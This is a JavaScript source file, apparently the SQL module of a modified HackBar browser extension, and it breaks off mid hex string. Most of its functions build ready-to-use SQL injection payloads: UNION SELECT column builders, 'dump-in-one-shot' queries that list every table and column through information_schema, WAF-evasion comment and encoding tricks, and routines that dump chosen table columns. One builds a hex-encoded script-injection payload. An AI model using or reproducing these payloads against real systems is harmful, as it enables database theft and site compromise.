SQL

1. HackBar.SQL = {
2.   selectionToSQLChar: function ( dbEngine )
3.   {
4.     var charStringArray = new Array();
5.     var txt = hackBar.getSelectedText();
6.     var decimal;
7.     for ( var c = 0 ; c < txt.length ; c++ ) {
8.       decimal = txt.charCodeAt( c );
9.       charStringArray.push( decimal );
10.     }
11.     var charString = '';
12.     switch ( dbEngine )
13.     {
14.       case "mysql":
15.         charString = 'CHAR(' + charStringArray.join(', ') + ')';
16.         break;
17.       case "mssql":
18.         charString = ' CHAR(' + charStringArray.join(') + CHAR(') + ')';
19.         break;
20.       case "oracle":
21.         charString = ' CHR(' + charStringArray.join(') || CHR(') + ')';
22.         break;
23.     }
24.     hackBar.setSelectedText( charString );
25.   },
26.   selectionToUnionSelect: function ( encoding )
27.   {
28.     var columns = prompt( "Amount of columns to use in the UNION SELECT Statement", "10" );
29.     columns = Math.min(1000, parseInt( columns ));
30.     var colArray = new Array();
31.     for ( var i = 0 ; i < columns ; i++ ) {
32.       colArray.push( i+1 );
33.     }
34.     var txt = "+UNION+ALL+SELECT+" + colArray.join( ',' );
35.     hackBar.setSelectedText( txt );
36.   },
37.   /*Union space Statement*/
38.     selectionToUnionSelect1: function ( encoding )
39.   {
40.     var columns = prompt( "Amount of columns to use in the UNION SELECT Statement", "10" );
41.     columns = Math.min(1000, parseInt( columns ));
42.     var colArray = new Array();
43.     for ( var i = 0 ; i < columns ; i++ ) {
44.       colArray.push( i+1 );
45.     }
46.     var txt = " Union Select " + colArray.join( ',' );
47.     hackBar.setSelectedText( txt );
48.   },
49.   selectionToUnionSelect3: function ( encoding )
50.   {
51.     var columns = prompt( "Number Counts ", "10" );
52.     columns = Math.min(1000, parseInt( columns ));
53.     var colArray = new Array();
54.     for ( var i = 0 ; i < columns ; i++ ) {
55.       colArray.push( i+1 );
56.     }
57.     var txt = " 0," + colArray.join( ',' );
58.     hackBar.setSelectedText( txt );
59.   },
60.   selectionToUnionSelect4: function ( encoding )
61.   {
62.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
63.     columns = Math.min(1000, parseInt( columns ));
64.     var colArray = new Array();
65.     for ( var i = 0 ; i < columns ; i++ ) {
66.       colArray.push( i+1 );
67.     }
68.     var txt = " div @s:=( concat(@c:=0x00,if((select count(*)/*!50000from*/ /*!50000information_schema*/.columns where table_schema=database/**X**/() and @c:=concat(@c, 0x3c62723e, /*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)) /*!50000union*/ select " + colArray.join( ',' );
69.     hackBar.setSelectedText( txt );
70.   },
71.   selectionToUnionSelect5: function ( encoding )
72.   {
73.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
74.     columns = Math.min(1000, parseInt( columns ));
75.     var colArray = new Array();
76.     for ( var i = 0 ; i < columns ; i++ ) {
77.       colArray.push( i+1 );
78.     }
79.     var txt = " +DiV@x:=(Select+export_set(5,@:=0,(select+count(*)from(/*!50000information_schema*/.columns)where@:=export_set(5,export_set(5,@,/*!50000table_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2)),@,2)) /*!50000union*/+ALL+SELECT+" + colArray.join( ',' );
80.     hackBar.setSelectedText( txt );
81.   },
82.   selectionToUnionSelect6: function ( encoding )
83.   {
84.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
85.     columns = Math.min(1000, parseInt( columns ));
86.     var colArray = new Array();
87.     for ( var i = 0 ; i < columns ; i++ ) {
88.       colArray.push( i+1 );
89.     }
90.     var txt = " and@:=(seleCt GrOup_ConcAt(0x3c62723e,Table_name,column_name) frOm /*!50000information_schema.columns*/ where table_schema not like 0x696e666f726d6174696f6e5f736368656d61) /*!50000Union*/ Select " + colArray.join( ',' );
91.     hackBar.setSelectedText( txt );
92.   },
93.   selectionToUnionSelect7: function ( encoding )
94.   {
95.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
96.     columns = Math.min(1000, parseInt( columns ));
97.     var colArray = new Array();
98.     for ( var i = 0 ; i < columns ; i++ ) {
99.       colArray.push( i+1 );
100.     }
101.     var txt = " and@x:=(/*!50000SELECT */GROUP_CONCAT(/*!50000table_name*/,0x2d2d2d3e,/*!50000column_Name*/ SEPARATOR 0x3c62723e)/*!50000FROM *//*!50000INFORMATION_SCHEMA*/.ColumnS WHERE TABLE_SCHEMA=DATABASE/**!**/())  /*!50000union*/ ALL /*!50000select*/" + colArray.join( ',' );
102.     hackBar.setSelectedText( txt );
103.   },
104.   selectionToUnionSelect8: function ( encoding )
105.   {
106.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
107.     columns = Math.min(1000, parseInt( columns ));
108.     var colArray = new Array();
109.     for ( var i = 0 ; i < columns ; i++ ) {
110.       colArray.push( i+1 );
111.     }
112.     var txt = " div @x:=(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(/*!50000INFORMATION_SCHEMA*/.COLUMNS)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT/**_**/(@x,0x3a20,0x3c666f6e7420636f6c6f723d677265656e3e,/*!50000table_name*/,0x202d2d20,0x3c666f6e7420636f6c6f723d7265643e,/*!50000column_name*/,0x3c62723e))))x) /*!50000Union*/ Select " + colArray.join( ',' );
113.     hackBar.setSelectedText( txt );
114.   },
115.   selectionToUnionSelect9: function ( encoding )
116.   {
117.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
118.     columns = Math.min(1000, parseInt( columns ));
119.     var colArray = new Array();
120.     for ( var i = 0 ; i < columns ; i++ ) {
121.       colArray.push( i+1 );
122.     }
123.     var txt = " and@x:=(Select+/*!50000export_set*/(5,@:=0,(select+count(*)from(/*!50000information_schema.columns*/)where@:=export_set(5,/*!50000export_set*/(5,@,/*!50000table_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2)),@,2))/*!50000UNION*/ ALL SELECT " + colArray.join( ',' );
124.     hackBar.setSelectedText( txt );
125.   },
126.   selectionToUnionSelect10: function ( encoding )
127.   {
128.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
129.     columns = Math.min(1000, parseInt( columns ));
130.     var colArray = new Array();
131.     for ( var i = 0 ; i < columns ; i++ ) {
132.       colArray.push( i+1 );
133.     }
134.     var txt = " and @s:=(select(@s)from(select(@s:=0x00),(@nr:=0),(select (0)from/*!50000information_schema*/.columns where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@s:=concat(@s,0x3c666f6e7420636f6c6f723d7265643e,lpad(@nr:=@nr%2b1,3,0x30),0x3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e20,/*!50000table_name*/,0x3c2f666f6e743e3c666f6e7420636f6c6f723d677265656e3e20,/*!50000column_name*/,0x3c2f666f6e743e3c62723e))))x)/*!50000union*/ select +" + colArray.join( ',' );
135.     hackBar.setSelectedText( txt );
136.   },
137.   selectionToUnionSelect11: function ( encoding )
138.   {
139.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
140.     columns = Math.min(1000, parseInt( columns ));
141.     var colArray = new Array();
142.     for ( var i = 0 ; i < columns ; i++ ) {
143.       colArray.push( i+1 );
144.     }
145.     var txt = "and@:=(SeLeCt /*!50000GrOup_ConCat(0x3c6c693e,/*!50000TaBle_naMe,0x207e20,/*!50000ColuMn_naMe*/)FrOm /*!50000inForMatiOn_scHeMa*/.ColuMns where table_schema=database/**_**/()) /*!50000union*/ select " + colArray.join( ',' );
146.     hackBar.setSelectedText( txt );
147.   },
148.   selectionToUnionSelect12: function ( encoding )
149.   {
150.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
151.     columns = Math.min(1000, parseInt( columns ));
152.     var colArray = new Array();
153.     for ( var i = 0 ; i < columns ; i++ ) {
154.       colArray.push( i+1 );
155.     }
156.     var txt = " or@aLi:=make_set(7,@:=0x00,(select(1)/*!50000from*/(/*!50000information_schema*/.Columns)where(Table_Schema!='Information_Schema')and@:=make_set(31,@,'<br>',/*!50000Table_Name*/,'-->',/*!50000Column_name*/)),@)/*!50000UniON*/select " + colArray.join( ',' );
157.     hackBar.setSelectedText( txt );
158.   },
159.   selectionToUnionSelect13: function ( encoding )
160.   {
161.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
162.     columns = Math.min(1000, parseInt( columns ));
163.     var colArray = new Array();
164.     for ( var i = 0 ; i < columns ; i++ ) {
165.       colArray.push( i+1 );
166.     }
167.     var txt = " and @:=(select(@)%66rom(select(@:=0x00),(select(@)%66rom(/*!50000information_schema.columns*/)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@)in(@:=concat/**alibro**/(@,0x3C62723E,/*!50000table_name*/,0x3a,/*!50000column_name*/))))a)/*!50000Union*/ Select " + colArray.join( ',' );
168.     hackBar.setSelectedText( txt );
169.   },
170.   selectionToUnionSelect14: function ( encoding )
171.   {
172.     var columns = prompt( "Amount of columns to use in the LOCAL DIOS Statement", "10" );
173.     columns = Math.min(1000, parseInt( columns ));
174.     var colArray = new Array();
175.     for ( var i = 0 ; i < columns ; i++ ) {
176.       colArray.push( i+1 );
177.     }
178.     var txt = " and @:=(select /*!50000GrOUp_ConCat(0x3c6c693e,/*!50000table_name*/,0x203a20,/*!50000column_name*/) %66rom/*!50000+information_schema.columns*/ where table_schema=database/**alibro**/()) /*!50000Union*/ Select " + colArray.join( ',' );
179.     hackBar.setSelectedText( txt );
180.   },
181.   /* GENERAL FUNCTIONS */
182.   selectionMySQLConvertUsing: function ( encoding )
183.   {
184.     var txt = hackBar.getSelectedText();
185.     txt = "CONVERT(" + txt + " USING " + encoding + ")";
186.     hackBar.setSelectedText( txt );
187.   },       
188.   /*########################################################################
189.     #                       MOD'S BY T.PROSPECT                            #
190.     #                            01/2014                                   #
191.     ########################################################################
192.    
193.    
194.     /* T.PRO FUNCTION */
195.     WichField: function (choice){  
196.         var str = choice;
197.         switch (str){                  
198.             case 'main_toogle':  
199.                     document.getElementById(str).setAttribute("checked",true);
200.                     document.getElementById('ref_toogle').setAttribute("checked",false);   
201.                     document.getElementById('post_toogle').setAttribute("checked",false);
202.                     document.getElementById('base_toogle').setAttribute("checked",false);                  
203.                     break; 
204.             case 'ref_toogle':  
205.                     document.getElementById(str).setAttribute("checked",true);
206.                     document.getElementById('main_toogle').setAttribute("checked",false);  
207.                     document.getElementById('post_toogle').setAttribute("checked",false);
208.                     document.getElementById('base_toogle').setAttribute("checked",false);  
209.                     break;
210.             case 'post_toogle':  
211.                     document.getElementById(str).setAttribute("checked",true);
212.                     document.getElementById('ref_toogle').setAttribute("checked",false);   
213.                     document.getElementById('main_toogle').setAttribute("checked",false);
214.                     document.getElementById('base_toogle').setAttribute("checked",false);      
215.                     break; 
216.             case 'base_toogle':  
217.                     document.getElementById(str).setAttribute("checked",true);             
218.                     document.getElementById('ref_toogle').setAttribute("checked",false);   
219.                     document.getElementById('post_toogle').setAttribute("checked",false);
220.                     document.getElementById('main_toogle').setAttribute("checked",false);  
221.                     break;
222.             default:
223.                     txt = "ERROR";
224.                     break;                 
225.         }          
226.     },
227.     ResizeText: function (multiplier){     
228.     if (document.getElementById('hackBarTargetUrl').style.fontSize == "") {
229.         document.getElementById('hackBarTargetUrl').style.fontSize = "12px";       
230.     }
231.     document.getElementById('hackBarTargetUrl').style.fontSize = parseFloat(document.getElementById('hackBarTargetUrl').style.fontSize) + (multiplier * 1) + "px"; 
232.     },
233.     ExecuteReplace: function (){
234.         if(document.getElementById('main_toogle').checked){txt = 'hackBarTargetUrl'};
235.         if(document.getElementById('ref_toogle').checked){txt = 'hackBarTargetUrlReferrerField'};
236.         if(document.getElementById('post_toogle').checked){txt = 'hackBarTargetUrlPostField'};
237.         if(document.getElementById('base_toogle').checked){txt = 'hackBarTargetUrlBase64Field'};
238.        
239.         ActiveQuery = document.getElementById(txt).value;
240.         if(ActiveQuery == ''){
241.         alert('No query found!(empty URL-FIELDS)\nPlease type in a query or deselect "all" checkbox and give a string in replace-input-field!')
242.         }else{
243.         // get query to replace
244.         ReplaceQuery = document.getElementById(txt).value;
245.         ReplaceQuery = encodeURIComponent(ReplaceQuery);
246.         // var UserInput = '%20';
247.         var UserInput = document.getElementById('rstring1').value;
248.         var UserInput = encodeURIComponent(UserInput);
249.         // get replace string input from user
250.         var InserString = document.getElementById('rstring2').value;
251.         var InserString = encodeURIComponent(InserString);
252.         var oldWordRegEx = new RegExp(UserInput,'g');
253.         var result = ReplaceQuery.replace(oldWordRegEx,InserString);       
254.         alert(result);     
255.         };     
256.     }, 
257.     ToHex: function (string){              
258.         var charStringArray = new Array;
259.         var decimal;
260.         for ( var c = 0 ; c < string.length ; c++ ) {
261.           decimal = string.charCodeAt( c );
262.           charStringArray.push( HackBar.Toolbox.dec2hex( decimal ) );    
263.         }
264.         string = charStringArray.join( '' );       
265.         return(string);            
266.     }, 
267.     FromHex: function (string){            
268.         var string = string.toLowerCase();
269.         string = string.replace( /%/g, '' );
270.         string = string.replace( /[^0-9abcdefg]/g, '' );
271.  
272.         var charStringArray = new Array();
273.         var buffer = '';
274.         var result = '';
275.         for ( var c = 0 ; c < string.length ; c++ ) {
276.           buffer += string.charAt( c ).toString();
277.           if ( buffer.length >= 2 ) {
278.             result += String.fromCharCode( HackBar.Toolbox.hex2dec( buffer ) );
279.             buffer = '';
280.           }
281.         }          
282.         return(result);        
283.     },
284.     ExecuteReplaceTest: function (){
285.         // get active field
286.         if(document.getElementById('main_toogle').checked){txt = 'hackBarTargetUrl'};
287.         if(document.getElementById('ref_toogle').checked){txt = 'hackBarTargetUrlReferrerField'};
288.         if(document.getElementById('post_toogle').checked){txt = 'hackBarTargetUrlPostField'};         
289.         var ReplaceQuery = document.getElementById(txt).value;
290.        
291.         var ReplaceQuery = ReplaceQuery.replace( new RegExp(/\n/g), '[X]' );
292.         var ReplaceQuery = ReplaceQuery.replace( new RegExp(/\r/g), '[Y]' );
293.  
294.        
295.         var UserInput = document.getElementById('rstring1').value;     
296.         var InserString = document.getElementById('rstring2').value;
297.         // check if "all" checkbox is checked
298.         if(document.getElementById('replace_check').checked){
299.             // check if fields are filled      
300.             if(ReplaceQuery == '' && UserInput == '' && InserString == ''){        
301.                 alert('[Replace Error-Message #1]\n\nPlease enter:\n1) Query field!\n2) Replace string!\n3) Replacing string!')
302.             };
303.             // check if fields are filled      
304.             if(ReplaceQuery != '' && UserInput == '' && InserString == ''){        
305.                 alert('[Replace Error-Message #2]\n\nPlease enter:\n1) Replace string!\n2) Replacing string!')
306.             };
307.             if(ReplaceQuery != '' && UserInput != '' && InserString == ''){        
308.                 alert('[Replace Error-Message #3]\n\nPlease enter:\nReplacing string!')
309.             }
310.             if(ReplaceQuery != '' && UserInput == '' && InserString != ''){        
311.                 alert('[Replace Error-Message #4]\n\nPlease enter:\nReplace string!')
312.             }
313.             if(ReplaceQuery == '' && UserInput != '' && InserString == ''){        
314.                 alert('[Replace Error-Message #5]\n\nPlease enter:\nReplacing string!')
315.             }
316.             if(ReplaceQuery == '' && UserInput == '' && InserString != ''){        
317.                 alert('[Replace Error-Message #6]\n\nPlease enter:\n1) Query field!\n2) Replace string!')
318.             }
319.             if(ReplaceQuery == '' && UserInput != '' && InserString != ''){        
320.                 alert('[Replace Error-Message #7]\n\nPlease enter:\n1) Query field!')
321.             }
322.             if(ReplaceQuery != '' && UserInput != '' && InserString != ''){        
323.                 //fields to hex
324.                 var UserInput = HackBar.SQL.ToHex(UserInput);
325.                 var InserString = HackBar.SQL.ToHex(InserString);      
326.                 var ReplaceQuery = HackBar.SQL.ToHex(ReplaceQuery);
327.                 // Regex with hex
328.                 var oldWordRegEx = new RegExp(UserInput,'g');
329.                 var result = ReplaceQuery.replace(oldWordRegEx,InserString);
330.                 var result = HackBar.SQL.FromHex(result);
331.                 // replaced hex result to string
332.                 var result = result.replace( new RegExp(/\[X]/g), '\n' );
333.                 var result = result.replace( new RegExp(/\[Y]/g), '\r' );
334.                 document.getElementById(txt).value = result;
335.             };                 
336.         }else{ 
337.             var UserInput = document.getElementById('rstring1').value;     
338.             var InserString = document.getElementById('rstring2').value;
339.             // check if fields are filled      
340.             if(UserInput == '' && InserString == ''){          
341.                 alert('[Replace Error-Message #1]\n\nPlease enter:\n1) Replace string!\n2) Replacing string!')
342.             };
343.             if(UserInput != '' && InserString == ''){          
344.                 alert('[Replace Error-Message #1]\n\nPlease enter:\n1) Replacing string!')
345.             };
346.             if(UserInput == '' && InserString != ''){          
347.                 alert('[Replace Error-Message #1]\n\nPlease enter:\n1) Replace string!')
348.             };         
349.             if(UserInput != '' && InserString != ''){          
350.                 var ReplaceQuery = hackBar.getSelectedText();
351.                 if(ReplaceQuery == ""){alert('[Replace Error-Message]\n\nMarked text is empty!\nPlease mark a text or select "all" checkbox for replacing in whole query!')};              
352.                 //fields to hex
353.                 var UserInput = HackBar.SQL.ToHex(UserInput);
354.                 var InserString = HackBar.SQL.ToHex(InserString);      
355.                 var ReplaceQuery = HackBar.SQL.ToHex(ReplaceQuery);
356.                 // Regex with hex
357.                 var oldWordRegEx = new RegExp(UserInput,'g');
358.                 var result = ReplaceQuery.replace(oldWordRegEx,InserString);
359.                 var result = HackBar.SQL.FromHex(result);
360.                 hackBar.setSelectedText( result );
361.             }; 
362.         };                 
363.     },
364.       /* T.PRO STATEMENTS FUNCTION */
365.       statementsTpro: function (choice) {
366.         var str = choice;
367.         switch (str){
368.             case '1': txt = "CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())";
369.                     break;     
370.             case '4':
371.                     var dbName = prompt("Database Name","DATABASE()");
372.                     var dbNameFinal = "0x";
373.                     if(dbName == "DATABASE()"){dbNameFinal="DATABASE()";}
374.                     else{
375.                         // Convert DB name to hex
376.                         for (var i = 0; i < dbName.length; i++){
377.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
378.                         }
379.                     }
380.                     txt = "(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=" + dbNameFinal + ")";
381.                     break;
382.             case '5': txt = "+ORDER+BY+1";
383.                     break;
384.             case '6':
385.                     var columns = 100;
386.                     columns = Math.min(1000, parseInt( columns ));
387.                     var colArray = new Array();
388.                     for ( var i = 0 ; i < columns ; i++ ) {
389.                       colArray.push( i+1 );
390.                     }
391.                     txt = "+GROUP+BY+" + colArray.join( ',' );
392.                     break;
393.             case '7':
394.                     var tblName = prompt("Table name","");
395.                     var tblNameFinal = "0x";
396.                     if(tblName == ""){tblNameFinal="[INSERT_TABLE]";}
397.                     else{
398.                         // Convert DB name to hex
399.                         for (var i = 0; i < tblName.length; i++){
400.                           tblNameFinal += tblName.charCodeAt(i).toString(16);
401.                         }
402.                     }
403.                     txt = "(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=" + tblNameFinal + ")";
404.                     break;
405.             case '8': txt = "+PROCEDURE+ANALYSE()";
406.                     break;
407.             case '9': var txt = hackBar.getSelectedText();
408.                     txt = "'+AND+(SELECT * FROM " + txt + ")=(SELECT 1)--+";
409.                     break;
410.             case '10':
411.                     var tblName = prompt("Table name","");
412.                     var tblNameFinal = "0x";
413.                     if(tblName == ""){tblNameFinal="[INSERT_TABLE]";}
414.                     else{
415.                         // Convert DB name to hex
416.                         for (var i = 0; i < tblName.length; i++){
417.                           tblNameFinal += tblName.charCodeAt(i).toString(16);
418.                         }
419.                     }
420.                     txt = "(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=" + tblNameFinal + ")AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,column_name,0x3c62723e)))))x)";
421.                     break;
422.             case '11':
423.                     var Db = prompt("Insert db name (or leave for current DB())","DATABASE()");
424.                     var table = prompt("Insert table name","TABLE_NAME to dump");
425.                     var cols = prompt("Insert columns to dump","column_1,column_2,column_3");                  
426.                     if(Db == ""){dbANDtable=table;}
427.                     if(Db == "DATABASE()"){dbANDtable=table;}
428.                     else{
429.                     dbANDtable=Db + "." + table;                   
430.                     }
431.                     txt = "(SELECT+GROUP_CONCAT(" + cols + "+SEPARATOR+0x3c62723e)+FROM+" + dbANDtable + ")";
432.                     break;
433.             case '152':
434.                     txt = "union select * from (select 1)a join(select 2)b join(select 3)c join(select 4)d join(select 5)e join(select 6)f join(select 7)g join(select 8)h join(select 9)i join(select 10)j join(select  11)k join(select 12)l join(select 13)m join(select 14)n join(select 15)o join(select 16)p join(select 17)q join(select 18)r join(select 19)s join(select 20)t join(select 21)u";
435.                     break;
436.             case '12':
437.                     var Db = prompt("Insert db name (or leave for current DB())","DATABASE()");
438.                     var table = prompt("Insert table name","TABLE_NAME to dump");
439.                     var cols = prompt("Insert columns to dump","column_1,column_2,column_3");                  
440.                     if(Db == ""){dbANDtable=table;}
441.                     if(Db == "DATABASE()"){dbANDtable=table;}
442.                     else{
443.                     dbANDtable=Db + "." + table;                   
444.                     }                  
445.                     txt = "(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(" + dbANDtable + ")WHERE(@x)IN(@x:=CONCAT(0x20,@x," + cols + ",0x3c62723e))))x)";
446.                     break;
447.             case '13':
448.                     var Db = prompt("Insert db name (or leave for current DB())","DATABASE()");
449.                     var table = prompt("Insert table name","TABLE_NAME to dump");
450.                     var cols = prompt("Insert columns to dump","column_1,column_2,column_3");                  
451.                     if(Db == ""){dbANDtable=table;}
452.                     if(Db == "DATABASE()"){dbANDtable=table;}
453.                     else{
454.                     dbANDtable=Db + "." + table;                   
455.                     }                              
456.                     txt = "(SELECT+GROUP_CONCAT(0x3c62723e," + cols + ")+FROM (" + dbANDtable + "))";
457.                     break;
458.             case '333':
459.                     var Db = prompt("Insert db name (or leave for current DB())","DATABASE()");
460.                     var table = prompt("Insert table name","TABLE_NAME to dump");
461.                     var cols = prompt("Insert columns to dump","column_1,column_2,column_3");                  
462.                     if(Db == ""){dbANDtable=table;}
463.                     if(Db == "DATABASE()"){dbANDtable=table;}
464.                     else{
465.                     dbANDtable=Db + "." + table;                   
466.                     }                              
467.                     txt = "concat(0x416c69204b68616e203a3a20,version(),0x3a3a3a,user(),0x3a3a3a,database(),(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(" + dbANDtable + ")WHERE(@x)IN(@x:=CONCAT(0x20,@x," + cols + ",0x3c62723e))))x))";
468.                     break;
469.             case '400':
470.                     var Db = prompt("Insert db name (or leave for current DB())","DATABASE()");
471.                     var table = prompt("Insert table name","TABLE_NAME to dump");
472.                     var cols = prompt("Insert columns to dump","column_1,column_2,column_3");        
473.                     if(Db == ""){dbANDtable=table;}
474.                     if(Db == "DATABASE()"){dbANDtable=table;}
475.                     else{
476.                     dbANDtable=Db + "." + table;          
477.                     }                    
478.                     txt = " +DiV@x:=(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(" + dbANDtable + ")WHERE(@x)IN(@x:=CONCAT/**X**/(0x20,@x," + cols + ",0x3c62723e))))x) /*!50000union*/+ALL+SELECT+";
479.                     break;
480.             case '401':
481.                     var Db = prompt("Insert db name (or leave for current DB())","DATABASE()");
482.                     var table = prompt("Insert table name","TABLE_NAME to dump");
483.                     var cols = prompt("Insert columns to dump","column_1,column_2,column_3");        
484.                     if(Db == ""){dbANDtable=table;}
485.                     if(Db == "DATABASE()"){dbANDtable=table;}
486.                     else{
487.                     dbANDtable=Db + "." + table;          
488.                     }                    
489.                     txt = " +DiV@x:=concat/**X**/((SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(" + dbANDtable + ")WHERE(@x)IN(@x:=CONCAT/**X**/(0x20,@x," + cols + ",0x3c62723e))))x),(Select+export_set(5,@:=0,(select+count(*)from(/*!50000information_schema*/.columns)where@:=export_set(5,export_set(5,@,/*!50000table_name*/,0x3c6c693e,2),/*!50000column_name*/,0xa3a,2)),@,2))) /*!50000union*/+ALL+SELECT+";
490.                     break;
491.             case '402':
492.                     var Db = prompt("Insert db name (or leave for current DB())","DATABASE()");
493.                     var table = prompt("Insert table name","TABLE_NAME to dump");
494.                     var cols = prompt("Insert columns to dump","column_1,column_2,column_3");        
495.                     if(Db == ""){dbANDtable=table;}
496.                     if(Db == "DATABASE()"){dbANDtable=table;}
497.                     else{
498.                     dbANDtable=Db + "." + table;          
499.                     }                    
500.                     txt = " and @s:=(select(@s)from(select(@s:=0x00),(select(@s)from(" + dbANDtable + ")where(@s)in(@s:=concat(@s," + cols + ",0x3c62723e))))x)/*!50000union*/ select +";
501.                     break;                        
502.             case '14':
503.                     txt = "(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))";
504.                     break;
505.             case '15':
506.                     var dbName = prompt("Database Name","database()");
507.                     var dbNameFinal = "0x";
508.                     if(dbName == "database()"){dbNameFinal="database()";}
509.                     else{
510.                         // Convert DB name to hexa
511.                         for (var i = 0; i < dbName.length; i++){
512.                           dbNameFinal += dbName.charCodeAt(i).toString(16);
513.                         }
514.                     }
515.                     txt = "(select (@x)from(select(@x:=0x00),(@NR_TAB:=0),(select (0)from(information_schema.tables)where(table_schema=" + dbNameFinal + ")and(0x00)in(@x:=concat(@x,0x3c62723e,0x3c62723e,0x3c7370616e207374796c653d22666f6e742d7765696768743a626f6c643b223e,@tbl:=table_name,0x202d2d3e205441424c45204e7220,(@NR_TAB:=@NR_TAB%2b1),0x3c2f7370616e3e,0x3c62723e,0x3c62723e,(@NR_COL:=char(0)),0x3c7370616e207374796c653d22666f6e742d7765696768743a626f6c643b223e434f4c554d53204f46205441424c453c2f7370616e3e3c62723e,(select group_concat((@NR_COL:=@NR_COL%2b1),0x20203a2020,column_name+separator+0x3c62723e)from+information_schema.columns+where+table_schema=Database()+and+table_name=@tbl)))))x)";
516.                     break;
517.             case '16':
518.                     txt = "(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))";
519.                     break;
520.             case '17':
521.                     txt = "make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)";
522.                     break;
523.             case '345':
524.                     txt = "/*!50000make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)*/";
525.                     break;     
526.             case '18':
527.                     txt = "concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c30783363326636363666366537343365336336323732336534653